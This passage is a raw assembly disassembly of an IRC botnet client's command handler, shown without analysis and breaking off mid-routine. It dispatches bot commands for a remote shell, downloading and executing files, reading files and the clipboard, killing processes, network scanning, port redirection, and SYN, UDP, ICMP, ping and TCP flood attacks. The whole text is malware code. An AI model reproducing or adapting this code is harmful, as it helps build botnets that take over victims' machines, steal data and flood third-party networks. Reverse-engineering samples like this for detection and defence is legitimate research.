push eax ; int
push [ebp+var_8C] ; Str
push [ebp+arg_4] ; int
call sub_405E64
add esp, 1Ch
jmp loc_40CA6C
; ---------------------------------------------------------------------------
loc_40A5AC: ; CODE XREF: sub_409557+1012�j
push edi ; Str2
push offset aThreads ; "threads"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E358
push edi ; Str2
push offset aT ; "t"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E358
push edi ; Str2
push offset aAliases ; "aliases"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E338
push edi ; Str2
push offset aAl ; "al"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E338
push edi ; Str2
push offset aLog_0 ; "log"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E248
push edi ; Str2
push offset aLg ; "lg"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E248
push edi ; Str2
push offset aClearlog ; "clearlog"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E22C
push edi ; Str2
push offset aClg ; "clg"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E22C
push edi ; Str2
push offset aNetinfo ; "netinfo"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E1F5
push edi ; Str2
push offset aNi ; "ni"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E1F5
push edi ; Str2
push offset aSysinfo ; "sysinfo"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E1CA
push edi ; Str2
push offset aSi ; "si"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E1CA
push edi ; Str2
push offset aRemov10e ; "remov10e"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E190
push edi ; Str2
push offset aRemov10e2 ; "remov10e2"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E190
push edi ; Str2
push offset aProcs ; "procs"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E06D
push edi ; Str2
push offset aPs ; "ps"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40E06D
push edi ; Str2
push offset aUptime ; "uptime"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40DFE9
push edi ; Str2
push offset aUp ; "up"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40DFE9
push edi ; Str2
push offset aDriveinfo ; "driveinfo"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40DFCC
push edi ; Str2
push offset aDrv ; "drv"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40DFCC
push edi ; Str2
push offset aTestdlls ; "testdlls"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40DFB3
push edi ; Str2
push offset aDll ; "dll"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40DFB3
push edi ; Str2
push offset aOpencmd ; "opencmd"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40DF6C
push edi ; Str2
push offset aOcmd ; "ocmd"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40DF6C
push edi ; Str2
push offset aCmdstop ; "cmdstop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40A7CD
push dword ptr [ebp+esi+Args]
push 7
push offset aRemoteShell ; "Remote shell"
push offset aCmd ; "[CMD]"
jmp loc_40E572
; ---------------------------------------------------------------------------
loc_40A7CD: ; CODE XREF: sub_409557+125C�j
push edi ; Str2
push offset aWho ; "who"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40A85A
cmp [ebp+var_8], ebx
jnz short loc_40A7FD
push ebx ; int
push [ebp+var_4] ; int
push offset aLoginList ; "-[Login List]-"
push [ebp+var_8C] ; Str
push [ebp+arg_4] ; int
call sub_405E64
add esp, 14h
loc_40A7FD: ; CODE XREF: sub_409557+128A�j
mov edi, [ebp+Str1]
xor esi, esi
loc_40A802: ; CODE XREF: sub_409557+12F1�j
cmp [edi], bl
lea eax, [edi+1]
jnz short loc_40A80E
mov eax, offset aEmpty ; "<Empty>"
loc_40A80E: ; CODE XREF: sub_409557+12B0�j
push eax
push esi
lea eax, [ebp+Dst]
push offset aD_S ; "%d. %s"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+var_8C] ; Str
push [ebp+arg_4] ; int
call sub_405E64
add esp, 24h
inc esi
add edi, 80h
cmp esi, 2
jl short loc_40A802
push offset aMainLoginListC ; "[MAIN]: Login list complete."
loc_40A84F: ; CODE XREF: sub_409557+4EED�j
call sub_402D63
pop ecx
jmp loc_40E7D9
; ---------------------------------------------------------------------------
loc_40A85A: ; CODE XREF: sub_409557+1285�j
push edi ; Str2
push offset aGetclip ; "getclip"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40DF2B
push edi ; Str2
push offset aGc ; "gc"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40DF2B
push edi ; Str2
push offset aFlusharp ; "flusharp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40DF00
push edi ; Str2
loc_40A89A: ; DATA XREF: .data:0041E5EC�o
; .data:0041E630�o ...
push offset aFarp ; "farp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40DF00
push edi ; Str2
push offset aFlushdns ; "flushdns"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40DEDC
push edi ; Str2
push offset aFdns ; "fdns"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40DEDC
push edi ; Str2
push offset aCurrentip ; "currentip"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40DE9F
push edi ; Str2
push offset aCip ; "cip"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40DE9F
push edi ; Str2
push offset aRloginserver ; "rloginserver"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40DD43
push edi ; Str2
push offset aRlogin ; "rlogin"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40DD43
push edi ; Str2
push offset aHttpserver ; "httpserver"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40DBCD
push edi ; Str2
push offset aHttp ; "http"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40DBCD
push edi ; Str2
push offset aTftpserver ; "tftpserver"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40DA8F
push edi ; Str2
push offset aTftp_0 ; "tftp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40DA8F
push edi ; Str2
push offset aFofofo2 ; "fofofo2"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D794
push edi ; Str2
push offset aSfofofo2a ; "sfofofo2a"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D794
mov edi, dword ptr [ebp+esi+Args]
cmp edi, ebx
jz loc_4099D2
push [ebp+Dest] ; Str2
push offset aNick_0 ; "nick"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D77B
push [ebp+Dest] ; Str2
push offset aN ; "n"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D77B
push [ebp+Dest] ; Str2
push offset aJoin ; "join"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D75B
push [ebp+Dest] ; Str2
push offset aJ ; "j"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D75B
push [ebp+Dest] ; Str2
push offset aPart_0 ; "part"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D742
push [ebp+Dest] ; Str2
push offset aPt ; "pt"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D742
push [ebp+Dest] ; Str2
push offset aRaw ; "raw"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D70B
push [ebp+Dest] ; Str2
push offset aR ; "r"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D70B
push [ebp+Dest] ; Str2
push offset aKillthread ; "killthread"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D648
push [ebp+Dest] ; Str2
push offset aK ; "k"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D648
push [ebp+Dest] ; Str2
push offset aC_quit ; "c_quit"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D59F
push [ebp+Dest] ; Str2
push offset aC_q ; "c_q"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D59F
push [ebp+Dest] ; Str2
push offset aC_rndnick ; "c_rndnick"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D554
push [ebp+Dest] ; Str2
push offset aC_rn ; "c_rn"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D554
push [ebp+Dest] ; Str2
push offset aPrefix ; "prefix"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D53F
push [ebp+Dest] ; Str2
push offset aPr ; "pr"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D53F
push [ebp+Dest] ; Str2
push offset aOpen ; "open"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D515
push [ebp+Dest] ; Str2
push offset aO ; "o"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D515
push [ebp+Dest] ; Str2
push offset aS3rv3rfg ; "s3rv3rfg"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D4F0
push [ebp+Dest] ; Str2
push offset aS3rv3rfg2 ; "s3rv3rfg2"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D4F0
push [ebp+Dest] ; Str2
push offset aDns ; "dns"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D480
push [ebp+Dest] ; Str2
push offset aDn ; "dn"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D480
push [ebp+Dest] ; Str2
push offset aKillproc ; "killproc"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D454
push [ebp+Dest] ; Str2
push offset aKp ; "kp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D454
push [ebp+Dest] ; Str2
push offset aKill ; "kill"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D3F9
push [ebp+Dest] ; Str2
push offset aKi ; "ki"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D3F9
push [ebp+Dest] ; Str2
push offset aDelete ; "delete"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D3C2
push [ebp+Dest] ; Str2
push offset aDel ; "del"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D3C2
push [ebp+Dest] ; Str2
push offset aList_0 ; "list"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D3A7
push [ebp+Dest] ; Str2
push offset aLi ; "li"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D3A7
push [ebp+Dest] ; Str2
push offset aMirccmd ; "mirccmd"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D36C
push [ebp+Dest] ; Str2
push offset aMirc ; "mirc"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D36C
push [ebp+Dest] ; Str2
push offset aCmd_0 ; "cmd"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D321
push [ebp+Dest] ; Str2
push offset aCm ; "cm"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D321
push [ebp+Dest] ; Str2
push offset aReadfile ; "readfile"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D29C
push [ebp+Dest] ; Str2
push offset aRf ; "rf"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D29C
push [ebp+Dest] ; Str2
push offset aIdent ; "ident"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_40ADD6
push edi ; Str2
push offset aOn ; "on"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40AD90
push 2
call sub_411E82
test eax, eax
pop ecx
jle short loc_40AD33
push offset aIdentAlreadyRu ; "[IDENT]: Already running."
jmp loc_40ADC3
; ---------------------------------------------------------------------------
loc_40AD33: ; CODE XREF: sub_409557+17D0�j
lea eax, [ebp+Dst]
push offset aIdentdServerRu ; "[IDENTD]: Server running on Port: 113."
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 2 ; int
push eax ; Source
call sub_411C3A
add esp, 14h
mov esi, eax
lea eax, [ebp+var_10]
push eax
push ebx
push esi
push offset sub_405C73
push ebx
push ebx
call ds:dword_41B064 ; CreateThread
imul esi, 234h
cmp eax, ebx
mov dword_430554[esi], eax
jnz loc_40CA4B
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax
push offset aIdentdFailedTo ; "[IDENTD]: Failed to start server, error"...
jmp loc_40E756
; ---------------------------------------------------------------------------
loc_40AD90: ; CODE XREF: sub_409557+17C4�j
push edi ; Str2
push offset aOff ; "off"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_40CA4B
push ebx
push 2
call sub_411E35
pop ecx
cmp eax, ebx
pop ecx
jle short loc_40ADBE
push eax
push offset aIdentServerSto ; "[IDENT]: Server stopped. (%d thread(s) "...
jmp loc_40E756
; ---------------------------------------------------------------------------
loc_40ADBE: ; CODE XREF: sub_409557+185A�j
push offset aIdentNoThreadF ; "[IDENT]: No thread found."
loc_40ADC3: ; CODE XREF: sub_409557+17D7�j
; sub_409557+4549�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp loc_40CA4B
; ---------------------------------------------------------------------------
loc_40ADD6: ; CODE XREF: sub_409557+17AF�j
push [ebp+Dest] ; Str2
push offset aNet ; "net"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_40B072
cmp dword_42EC80, ebx
jz short loc_40AE07
cmp dword_42ECA8, ebx
jz short loc_40AE07
push offset aNetFailedToLoa ; "[NET]: Failed to load advapi32.dll or n"...
jmp loc_40CC97
; ---------------------------------------------------------------------------
loc_40AE07: ; CODE XREF: sub_409557+189C�j
; sub_409557+18A4�j
cmp [ebp+var_C], ebx
jz loc_40CCA5
mov eax, [ebp+esi+var_8C]
mov [ebp+Src], ebx
cmp eax, ebx
mov [ebp+Str1], eax
jz short loc_40AE2F
push eax ; SubStr
push [ebp+var_C] ; Str
call _strstr
pop ecx
mov [ebp+Src], eax
pop ecx
loc_40AE2F: ; CODE XREF: sub_409557+18C8�j
push edi ; Str2
push offset aStart ; "start"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40AE95
cmp [ebp+Str1], ebx
jz short loc_40AE69
push [ebp+Src]
push 3
loc_40AE4A: ; CODE XREF: sub_409557+1954�j
; sub_409557+196C�j ...
call sub_4073D2
push eax
lea eax, [ebp+Dst]
push offset aS_2 ; "%s"
push eax ; Dest
call _sprintf
add esp, 14h
jmp loc_40CCA5
; ---------------------------------------------------------------------------
loc_40AE69: ; CODE XREF: sub_409557+18EC�j
push [ebp+var_4] ; int
push [ebp+var_8C] ; Str
push [ebp+arg_4] ; int
call sub_407679
add esp, 0Ch
test eax, eax
jz short loc_40AE8B
push offset aNetServiceList ; "[NET]: Service list completed."
jmp loc_40CC97
; ---------------------------------------------------------------------------
loc_40AE8B: ; CODE XREF: sub_409557+1928�j
push offset aNetServiceLi_0 ; "[NET]: Service list failed."
jmp loc_40CC97
; ---------------------------------------------------------------------------
loc_40AE95: ; CODE XREF: sub_409557+18E7�j
push edi ; Str2
push offset aStop ; "stop"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40AEAD
push [ebp+Src]
push 4
jmp short loc_40AE4A
; ---------------------------------------------------------------------------
loc_40AEAD: ; CODE XREF: sub_409557+194D�j
push edi ; Str2
push offset aPause ; "pause"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40AEC5
push [ebp+Src]
push 5
jmp short loc_40AE4A
; ---------------------------------------------------------------------------
loc_40AEC5: ; CODE XREF: sub_409557+1965�j
push edi ; Str2
push offset aContinue ; "continue"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40AEE0
push [ebp+Src]
push 6
jmp loc_40AE4A
; ---------------------------------------------------------------------------
loc_40AEE0: ; CODE XREF: sub_409557+197D�j
push edi ; Str2
push offset aDelete ; "delete"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40AEFB
push [ebp+Src]
push 1
jmp loc_40AE4A
; ---------------------------------------------------------------------------
loc_40AEFB: ; CODE XREF: sub_409557+1998�j
push edi ; Str2
push offset aShare ; "share"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40AF78
cmp [ebp+Str1], ebx
jz short loc_40AF4B
cmp [ebp+var_9B0], bl
jz short loc_40AF21
push ebx
push [ebp+Str1]
push 1
jmp short loc_40AF2C
; ---------------------------------------------------------------------------
loc_40AF21: ; CODE XREF: sub_409557+19C0�j
push [ebp+esi+var_88] ; int
push [ebp+Str1] ; Str
push ebx ; int
loc_40AF2C: ; CODE XREF: sub_409557+19C8�j
call sub_4077B6
push eax
lea eax, [ebp+Dst]
push offset aS_2 ; "%s"
push eax ; Dest
call _sprintf
add esp, 18h
jmp loc_40CCA5
; ---------------------------------------------------------------------------
loc_40AF4B: ; CODE XREF: sub_409557+19B8�j
push ebx ; int
push [ebp+var_4] ; int
push [ebp+var_8C] ; Str
push [ebp+arg_4] ; int
call sub_407944
add esp, 10h
test eax, eax
jz short loc_40AF6E
push offset aNetShareListCo ; "[NET]: Share list completed."
jmp loc_40CC97
; ---------------------------------------------------------------------------
loc_40AF6E: ; CODE XREF: sub_409557+1A0B�j
push offset aNetShareListFa ; "[NET]: Share list failed."
jmp loc_40CC97
; ---------------------------------------------------------------------------
loc_40AF78: ; CODE XREF: sub_409557+19B3�j
push edi ; Str2
push offset aUser_2 ; "user"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_40B01A
mov eax, [ebp+Str1]
cmp eax, ebx
jz short loc_40AFED
cmp [ebp+var_9B0], bl
jz short loc_40AFAE
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
push ebx
push eax
push 1
jmp short loc_40AFCE
; ---------------------------------------------------------------------------
loc_40AFAE: ; CODE XREF: sub_409557+1A43�j
push [ebp+var_4] ; int
mov esi, [ebp+esi+var_88]
cmp esi, ebx
push [ebp+var_8C] ; Str
push [ebp+arg_4] ; int
jz short loc_40AFCA
push esi
push eax
push ebx
jmp short loc_40AFCE
; ---------------------------------------------------------------------------
loc_40AFCA: ; CODE XREF: sub_409557+1A6C�j
push ebx ; int
push eax ; int
push 2 ; int
loc_40AFCE: ; CODE XREF: sub_409557+1A55�j
; sub_409557+1A71�j
call sub_407A65
push eax
lea eax, [ebp+Dst]
push offset aS_2 ; "%s"
push eax ; Dest
call _sprintf
add esp, 24h
jmp loc_40CCA5
; ---------------------------------------------------------------------------
loc_40AFED: ; CODE XREF: sub_409557+1A3B�j
push ebx ; int
push [ebp+var_4] ; int
push [ebp+var_8C] ; Str
push [ebp+arg_4] ; int
call sub_407F79
add esp, 10h
test eax, eax
jz short loc_40B010
push offset aNetUserListCom ; "[NET]: User list completed."
jmp loc_40CC97
; ---------------------------------------------------------------------------
loc_40B010: ; CODE XREF: sub_409557+1AAD�j
push offset aNetUserListFai ; "[NET]: User list failed."
jmp loc_40CC97
; ---------------------------------------------------------------------------
loc_40B01A: ; CODE XREF: sub_409557+1A30�j
push edi ; Str2
push offset aSend ; "send"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40B068
cmp [ebp+Str1], ebx
jz short loc_40B05E
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
push [ebp+Src] ; Source
call sub_40822D
push eax
lea eax, [ebp+Dst]
push offset aS_2 ; "%s"
push eax ; Dest
call _sprintf
add esp, 1Ch
jmp loc_40CCA5
; ---------------------------------------------------------------------------
loc_40B05E: ; CODE XREF: sub_409557+1AD7�j
push offset aNetNoMessageSp ; "[NET]: No message specified."
jmp loc_40CC97
; ---------------------------------------------------------------------------
loc_40B068: ; CODE XREF: sub_409557+1AD2�j
push offset aNetCommandUnkn ; "[NET]: Command unknown."
jmp loc_40CC97
; ---------------------------------------------------------------------------
loc_40B072: ; CODE XREF: sub_409557+1890�j
push [ebp+Dest] ; Str2
push offset aGethost ; "gethost"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D1B8
push [ebp+Dest] ; Str2
push offset aGh ; "gh"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D1B8
mov eax, [ebp+esi+var_8C]
cmp eax, ebx
mov [ebp+Str1], eax
jz loc_4099D2
push [ebp+Dest] ; Str2
push offset aAddalias ; "addalias"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D179
push [ebp+Dest] ; Str2
push offset aAa ; "aa"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D179
push [ebp+Dest] ; Str2
push offset aPrivmsg_0 ; "privmsg"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D126
push [ebp+Dest] ; Str2
push offset aPm_0 ; "pm"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D126
push [ebp+Dest] ; Str2
push offset aAction ; "action"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D0B8
push [ebp+Dest] ; Str2
push offset aA_1 ; "a"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D0B8
push [ebp+Dest] ; Str2
push offset aCycle ; "cycle"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D055
push [ebp+Dest] ; Str2
push offset aCy ; "cy"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D055
push [ebp+Dest] ; Str2
push offset aMode ; "mode"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D016
push [ebp+Dest] ; Str2
push offset aM_0 ; "m"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40D016
push [ebp+Dest] ; Str2
push offset aC_raw ; "c_raw"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40CFAB
push [ebp+Dest] ; Str2
push offset aC_r ; "c_r"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40CFAB
push [ebp+Dest] ; Str2
push offset aC_mode ; "c_mode"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40CF29
push [ebp+Dest] ; Str2
push offset aC_m ; "c_m"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40CF29
push [ebp+Dest] ; Str2
push offset aC_nick ; "c_nick"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40CEB8
push [ebp+Dest] ; Str2
push offset aC_n ; "c_n"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40CEB8
push [ebp+Dest] ; Str2
push offset aC_join ; "c_join"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40CE92
push [ebp+Dest] ; Str2
push offset aC_j ; "c_j"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40CE92
push [ebp+Dest] ; Str2
push offset aC_part ; "c_part"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40CE2F
push [ebp+Dest] ; Str2
push offset aC_p ; "c_p"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40CE2F
push [ebp+Dest] ; Str2
push offset aRepeat ; "repeat"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40CD69
push [ebp+Dest] ; Str2
push offset aRp ; "rp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40CD69
push [ebp+Dest] ; Str2
push offset aDelay ; "delay"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40CCCE
push [ebp+Dest] ; Str2
push offset aDe ; "de"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40CCCE
push [ebp+Dest] ; Str2
push offset aFalehupd ; "falehupd"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40CB16
push [ebp+Dest] ; Str2
push offset aUfalehupdp ; "ufalehupdp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40CB16
push [ebp+Dest] ; Str2
push offset aExecute ; "execute"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40CA83
push [ebp+Dest] ; Str2
push offset aE ; "e"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40CA83
push [ebp+Dest] ; Str2
push offset aRename ; "rename"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40C9FF
push [ebp+Dest] ; Str2
push offset aMv ; "mv"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40C9FF
push [ebp+Dest] ; Str2
push offset aIcmpflood ; "icmpflood"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40C904
push [ebp+Dest] ; Str2
push offset aIcmp ; "icmp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40C904
mov eax, [ebp+esi+var_88]
cmp eax, ebx
mov [ebp+Src], eax
jz loc_4099D2
push [ebp+Dest] ; Str2
push offset aClone_0 ; "clone"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40C819
push [ebp+Dest] ; Str2
push offset aC ; "c"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40C819
push [ebp+Dest] ; Str2
push offset Str2 ; "ddos.syn"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40C714
push [ebp+Dest] ; Str2
push offset aDdos_ack ; "ddos.ack"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40C714
push [ebp+Dest] ; Str2
push offset aDdos_random ; "ddos.random"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40C714
push [ebp+Dest] ; Str2
push offset aSynflood ; "synflood"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40C616
push [ebp+Dest] ; Str2
push offset aSyn_0 ; "syn"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40C616
push [ebp+Dest] ; Str2
push offset aFalehdownl ; "falehdownl"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40C4D8
push [ebp+Dest] ; Str2
push offset aFalehdownl2 ; "falehdownl2"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40C4D8
push [ebp+Dest] ; Str2
push offset aRedirect_0 ; "redirect"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40C3DE
push [ebp+Dest] ; Str2
push offset aRd ; "rd"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40C3DE
push [ebp+Dest] ; Str2
push offset aScan_1 ; "scan"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40C2EB
push [ebp+Dest] ; Str2
push offset aSc ; "sc"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40C2EB
push [ebp+Dest] ; Str2
push offset aC_privmsg ; "c_privmsg"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40C216
push [ebp+Dest] ; Str2
push offset aC_pm ; "c_pm"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40C216
push [ebp+Dest] ; Str2
push offset aC_action ; "c_action"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40C101
push [ebp+Dest] ; Str2
push offset aC_a ; "c_a"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40C101
mov eax, [ebp+esi+Str]
cmp eax, ebx
mov [ebp+arg_8], eax
jz loc_4099D2
push [ebp+Dest] ; Str2
push offset aFofofo ; "fofofo"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40BDA8
push [ebp+Dest] ; Str2
push offset aF0f0f0 ; "f0f0f0"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40BDA8
push [ebp+Dest] ; Str2
push offset aUdpflood ; "udpflood"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40BC88
push [ebp+Dest] ; Str2
push offset aUdp ; "udp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40BC88
push [ebp+Dest] ; Str2
push offset aU ; "u"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40BC88
push [ebp+Dest] ; Str2
push offset aPingflood ; "pingflood"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40BB55
push [ebp+Dest] ; Str2
push offset aPing_1 ; "ping"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40BB55
push [ebp+Dest] ; Str2
push offset aP ; "p"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40BB55
push [ebp+Dest] ; Str2
push offset aTcpflood ; "tcpflood"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40B9C2
push [ebp+Dest] ; Str2
push offset aTcp ; "tcp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40B9C2
push [ebp+Dest] ; Str2
push offset aEmail ; "email"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_40B7C3
lea eax, [ebp+var_3E4]
push edi ; Source
push eax ; Dest
call _strcpy
push [ebp+Str1] ; Str
call _atoi
push [ebp+Src] ; Source
mov [ebp+Str1], eax
lea eax, [ebp+var_D9C]
push eax ; Dest
call _strcpy
push [ebp+arg_8] ; Source
lea eax, [ebp+var_B94]
push eax ; Dest
call _strcpy
push offset Delim ; " "
push offset a_ ; "_"
push [ebp+esi+Format] ; Src
call sub_406DDF
push eax ; Source
lea eax, [ebp+var_548]
push eax ; Dest
call _strcpy
add esp, 30h
lea eax, [ebp+var_6F4]
push eax
push 101h
call dword_42EB38 ; WSAStartup
lea eax, [ebp+var_3E4]
push eax
call dword_42EC34 ; gethostbyname
push 6
push 1
push 2
mov edi, eax
call dword_42EC30 ; socket
push [ebp+Str1]
mov esi, eax
mov [ebp+var_2D8], 2
